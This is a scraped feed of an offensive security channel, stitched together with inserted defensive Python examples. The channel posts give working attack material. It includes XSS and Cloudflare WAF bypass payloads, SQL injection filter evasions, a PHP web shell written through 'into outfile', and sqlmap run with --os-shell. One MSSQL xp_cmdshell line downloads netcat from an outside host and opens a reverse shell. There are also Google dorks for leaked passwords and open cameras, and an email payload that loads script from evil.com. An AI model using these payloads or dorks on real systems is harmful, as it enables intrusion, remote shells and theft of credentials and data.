ExploitQuest
6.84K subscribers
My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system

https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
I found Open Redirect on a government website gov
CVE-2024-10793

WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1

curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
  -d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'
โค5
💻 Disclosed vulnerabilities with bug bounty

1️⃣ Account takeover via Self-XSS
An example of how additional functionality can turn a supposedly useless Self-XSS into a one-click account takeover. See the report for more details.

2️⃣ SQL injection in a POST request
Identifying and exploiting a Union-based SQL injection in a POST request from the server's responses. More on exploiting such vulnerabilities here.

3️⃣ OTP bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.

#web #xss #sqli
โค7๐Ÿ‘3๐Ÿ‘2
ExploitQuest
Photo
💉 About bypassing protection against SQL injections

Often the WAF on a site stifles every attempt at SQL injection and will not even let you insert a quotation mark followed by the usual payload. With a few clever manipulations, however, it is often still possible to bypass it.

For example, by adding control characters such as %00, %0A, etc., or by inserting arithmetic operations:

( 'AND'1'=1*1 instead of 'AND'1'='1' )

or by adding specific comments such as:

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

and much more.

For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.


https://websec.ca/kb/sql_injection

https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
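As an added illustration (my code, not from the channel or the linked repositories), here is why the obfuscations above slip past a naive signature and what an inspection engine has to do before matching: URL-decode, drop %00, unwrap MySQL's /*!50000 ... */ conditional comments, and collapse whitespace. The sample strings are constructed from the payloads in the post; the regexes are a deliberately small stand-in for real WAF rules, and on the application side the real fix remains parameterised queries.

```python
import re
from urllib.parse import unquote

# Constructed samples: obfuscated forms from the post next to the plain form
# they stand for, plus one benign value that contains a quote.
SAMPLES = {
    "plain union":      "' UNION SELECT 1,2 -- ",
    "version comments": "/*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2",
    "control chars":    "'%00 UNION%0ASELECT 1,2",
    "math tautology":   "' AND '1'=1*1",
    "benign":           "O'Brien",
}

# A first-generation signature: regexes applied to the raw parameter value.
NAIVE_RULES = [
    re.compile(r"union\s+select", re.I),
    re.compile(r"'\s*(and|or)\s*'\d+'\s*=\s*'\d+'", re.I),   # expects '1'='1' exactly
]

def naive_blocks(raw: str) -> bool:
    return any(r.search(raw) for r in NAIVE_RULES)

def normalize(raw: str) -> str:
    """Canonicalise the value the way an inspection engine should before matching."""
    s = raw
    for _ in range(3):                      # peel double/triple URL encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace("\x00", "")                                   # %00 terminators
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r"\1", s, flags=re.S)     # /*!50000kw*/ -> kw
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)                # ordinary comments vanish
    s = re.sub(r"\s+", " ", s)                                  # %0A, tabs, etc. -> one space
    return s.lower().strip()

# The same intent expressed over the normalised value; the tautology rule
# tolerates an expression (1*1) on the right-hand side.
NORMALIZED_RULES = [
    re.compile(r"\bunion\b.*\bselect\b"),
    re.compile(r"'\s*(and|or)\s*'?\w+'?\s*=\s*'?\w+"),
]

def normalized_blocks(raw: str) -> bool:
    s = normalize(raw)
    return any(r.search(s) for r in NORMALIZED_RULES)

def compare() -> dict:
    """Per sample: (flagged by the naive rules, flagged after normalisation)."""
    return {name: (naive_blocks(v), normalized_blocks(v)) for name, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:18} naive={naive!s:5} normalized={norm}")
```

Run it and the naive filter passes three of the four hostile samples while the normalised check flags all four and leaves the benign value alone. The `1*1` trick works against a rule that insists on `'1'='1'`, which is why matching has to happen on a canonical form rather than on the bytes as sent.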

#web #sqli #bypass #waf
โค6๐Ÿ”ฅ3
You can use httpx to request any path and see the status code, content length and other details on the fly; use the filter or matcher flags if you want to be more specific.

httpx -path /swagger-api/ -status-code -content-length
🗂 Forgotten database dumps

Old database dumps can contain all sorts of interesting information: user credentials, configuration settings, API secrets and keys, customer data, and more.

Here is a short but effective checklist for quickly finding forgotten database dumps:

/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
๐Ÿ‘4โค1
dork:

intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
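From the defender's side the same checklist doubles as a self-audit. This added example (my code, not from the channel) walks a served directory tree and reports any file whose name is on the list; the compressed and renamed variants (`.sql.gz`, `.sql.bak` and so on) are my addition, and the sample tree is constructed in a temporary directory so the script runs offline.

```python
import os
import tempfile
from pathlib import Path

# Base names from the post's checklist (case-insensitive match below).
DUMP_NAMES = {
    "back", "backup", "accounts", "backups", "clients", "customers", "data",
    "database", "users", "db", "db_backup", "dbase", "dbdump", "setup",
    "sqldump", "dump", "mysql", "sql", "temp",
}
# The post lists .sql and .sqlite; the other suffixes are my addition, since
# forgotten dumps are often compressed or renamed rather than deleted.
DUMP_SUFFIXES = (".sql", ".sqlite", ".sql.gz", ".sql.zip", ".sql.bak", ".sql.old", ".sql.txt")

def is_dump_name(filename: str) -> bool:
    """True if the file name matches a checklist name plus a dump suffix."""
    name = filename.lower()
    for suffix in DUMP_SUFFIXES:
        if name.endswith(suffix):
            return name[: -len(suffix)] in DUMP_NAMES
    return False

def find_exposed_dumps(webroot: str) -> list[str]:
    """Return paths (relative to webroot) that a crawler or a dork could pick up."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        for fn in filenames:
            if is_dump_name(fn):
                hits.append(os.path.relpath(os.path.join(dirpath, fn), webroot))
    return sorted(hits)

def build_demo_webroot() -> str:
    """Constructed sample tree: two forgotten dumps, one compressed, two harmless files."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel in ("index.html", "backup.sql", "old/DB.sqlite",
                "exports/users.sql.gz", "assets/logo.png"):
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("-- constructed sample, not a real dump\n")
    return root

if __name__ == "__main__":
    root = build_demo_webroot()
    for hit in find_exposed_dumps(root):
        print("exposed dump:", hit)
```

Anything it reports belongs outside the web root entirely; while you move it, a web-server rule along the lines of nginx's `location ~* \.(sql|sqlite)(\.gz|\.zip|\.bak|\.old)?$ { deny all; }` stops the files being served, and running the dork above against your own domain confirms nothing is already indexed.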
๐Ÿ‘4โค1
gov
๐Ÿ”ฅ3๐Ÿ‘1
💉 Transition from SQL injection to shell or backdoor

▫️ Use the “into outfile” clause to write to a file:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

▫️ Capture the request in Burp Proxy, save it to a file named post-request, then run sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

▫️ Reverse netcat shell via MSSQL injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#web #sqli
📨 Getting other vulnerabilities through file upload

When testing file upload functionality in a web application, try setting the file name to the following values:


โ–ซ๏ธ ../../../tmp/lol.png -> for Path Traversal vulnerability


โ–ซ๏ธ sleep(10)-- -.jpg -> for SQL injection


โ–ซ๏ธ <svg onload=alert(document.domain)>.jpg/png -> for XSS


โ–ซ๏ธ ; sleep 10; -> for command injection


These payloads may introduce additional vulnerabilities.
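How an upload handler keeps those four names harmless, as an added Python example (my code, not from the channel): the on-disk path is a random token plus an allow-listed extension, the original name reaches the database only through a parameterised query, any shell argument is quoted, and the name is HTML-escaped on output. The `/var/uploads` directory and the table layout are assumptions; the inputs are the post's payloads, with a `.png` appended to the command-injection one so it gets past the extension check and reaches the later stages.

```python
import html
import os
import secrets
import shlex
import sqlite3
import re

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Constructed inputs: the four payload shapes from the post.
HOSTILE_NAMES = [
    "../../../tmp/lol.png",
    "sleep(10)-- -.jpg",
    "<svg onload=alert(document.domain)>.jpg",
    "; sleep 10;.png",
]

def _basename(user_filename: str) -> str:
    # Strip directory components from both Unix- and Windows-style paths.
    return os.path.basename(user_filename.replace("\\", "/"))

def extension_of(user_filename: str) -> str:
    base = _basename(user_filename)
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""

def is_allowed(user_filename: str) -> bool:
    return extension_of(user_filename) in ALLOWED_EXTENSIONS

def safe_storage_name(user_filename: str) -> str:
    """On-disk name = random token + allow-listed extension; nothing the user typed reaches the path."""
    if not is_allowed(user_filename):
        raise ValueError(f"extension not allowed: {extension_of(user_filename)!r}")
    return f"{secrets.token_hex(16)}.{extension_of(user_filename)}"

def display_name(user_filename: str) -> str:
    """Name kept for showing back to users: base name only, control chars removed, length-capped."""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", _basename(user_filename))[:100]
    return cleaned or "upload"

def store_metadata(conn: sqlite3.Connection, original_name: str, stored_name: str) -> None:
    """Parameterised insert: the name travels as data, so 'sleep(10)-- -' is inert."""
    conn.execute(
        "INSERT INTO uploads(original_name, stored_name) VALUES (?, ?)",
        (display_name(original_name), stored_name),
    )

def process_upload(user_filename: str, conn: sqlite3.Connection) -> dict:
    stored = safe_storage_name(user_filename)
    store_metadata(conn, user_filename, stored)
    return {
        "stored": stored,
        # If a shell tool (say an image converter) must see the path, quote it;
        # the name is ours anyway. /var/uploads is an assumed location.
        "shell_arg": shlex.quote(os.path.join("/var/uploads", stored)),
        # HTML output is escaped, so the <svg ...> name renders as text, not markup.
        "rendered": html.escape(display_name(user_filename)),
    }

def run_demo() -> tuple[dict, int]:
    """Push the hostile names through an in-memory DB; return per-name results and the row count."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads(id INTEGER PRIMARY KEY, original_name TEXT, stored_name TEXT)")
    results = {name: process_upload(name, conn) for name in HOSTILE_NAMES}
    return results, conn.execute("SELECT COUNT(*) FROM uploads").fetchone()[0]

if __name__ == "__main__":
    results, rows = run_demo()
    for name, r in results.items():
        print(f"{name!r:45} -> {r['stored']}  shown as {r['rendered']}")
    print("rows stored:", rows)
```

The traversal name never becomes a path component, the SQL-looking name is just a string in a bound parameter, and the SVG name is rendered as `&lt;svg ...&gt;`; the one thing the user still controls is the extension, which is why it is checked against an allow-list rather than a deny-list.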

#web
๐Ÿ‘3๐Ÿ‘3โค1
🔎 A small selection of interesting Google dorks

▫️ FTP servers and sites:
intitle:"index of" inurl:ftp after:2018

▫️ Log files with passwords:
allintext:password filetype:log after:2018

▫️ Configuration files with passwords:
filetype:env "DB_PASSWORD" after:2018

▫️ Lists with email addresses:
filetype:xls inurl:"email.xls"

▫️ Open cameras:
inurl:top.htm inurl:currenttime

#web #google
๐Ÿ‘5โค3๐Ÿ”ฅ1
After exploiting SQL injection using the following email address

"'-sleep(5)-'"@mail.local

you can't help but wonder: why the hell did this even get through as a valid email?

In general, according to the RFC the local part of an email (the login, before the @) may contain special characters if it is enclosed in double quotes. Beyond that, our beloved programming languages each deviate a little in which characters they accept.

So, the next bit of magic:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);"

It validates and happily returns an email containing the attack vector:

"'--><script/src=//evil.com></script>"@example.com

How the developers then display it is a separate question.
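To make the RFC point concrete, here is an added Python example (my code, not from the channel; Python has no filter_var, so the RFC-style pattern below is a simplified stand-in for it). An RFC-faithful pattern accepts both quoted addresses from the post, while a pragmatic sign-up policy that allows only a plain dot-atom local part rejects them, which is the decision most applications can safely make. The sample addresses are constructed.

```python
import re

# RFC 5322 shape: a quoted local part may hold almost any printable character,
# including ' " < > ( ) ; which is exactly why the post's addresses validate.
QUOTED_LOCAL = r'"(?:[^"\\\r\n]|\\.)*"'
DOT_ATOM = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
DOMAIN = r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,}"

RFC_EMAIL = re.compile("^(?:" + QUOTED_LOCAL + "|" + DOT_ATOM + ")@" + DOMAIN + "$")

# Pragmatic policy: no quoted local part, a small character set, RFC length cap.
PRAGMATIC_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@" + DOMAIN + r"$")

# Constructed samples: two ordinary addresses, the two from the post, one junk value.
SAMPLES = [
    "alice@example.com",
    "first.last+tag@example.co.uk",
    "\"'-sleep(5)-'\"@mail.local",
    "\"'--><script/src=//evil.com></script>\"@example.com",
    "not an email",
]

def rfc_accepts(addr: str) -> bool:
    return RFC_EMAIL.fullmatch(addr) is not None

def pragmatic_accepts(addr: str) -> bool:
    return PRAGMATIC_EMAIL.fullmatch(addr) is not None

def classify(addr: str) -> str:
    """accept / reject-unusual (RFC-valid but outside the policy) / reject-invalid."""
    if pragmatic_accepts(addr):
        return "accept"
    if rfc_accepts(addr):
        return "reject-unusual"
    return "reject-invalid"

if __name__ == "__main__":
    for addr in SAMPLES:
        print(f"{addr!r:55} rfc={rfc_accepts(addr)!s:5} policy={classify(addr)}")
```

Even under the strict policy the stored address is still data: bind it as a query parameter and escape it on output, because validation is not sanitisation, and log the reject-unusual cases, since an RFC-valid address with a quote or an angle bracket in it is far more often a probe than a real user.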

#sqli
Memes about XSS are like this 🤡😂.
๐Ÿ˜10
⛅️ Bypass Cloudflare WAF

Payloads that worked at the time of publication for performing XSS on sites protected by the Cloudflare WAF.

<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>

<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">

#web #xss
โค4
Hacking with an image: a PHP payload inside a JPEG.

The php-jpeg-injector tool can be used to attack web applications that pass an uploaded .jpeg image through PHP's GD graphics library.

The tool creates a new .jpeg file with an embedded PHP payload. The infected .jpeg is run through PHP's GD library; PHP then interprets the payload injected into the JPEG and executes it.


#web

GitHub Link
โค3๐Ÿ‘3
💉 Find SQL injection on a site with one command

As always, a chain of tools is used for this.

findomain collects the subdomains of the site being tested.

httpx checks which of them are alive.

waybackurls retrieves every URL the Wayback Machine knows for the identified live subdomains.

anew merges the findomain and waybackurls output and removes duplicates.

Then gf filters the URLs for patterns that suggest a potential SQL injection (don't forget to install gf-patterns as well).

Finally, sqlmap runs against every identified potentially vulnerable URL.

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent

#web #sqli
๐Ÿ‘11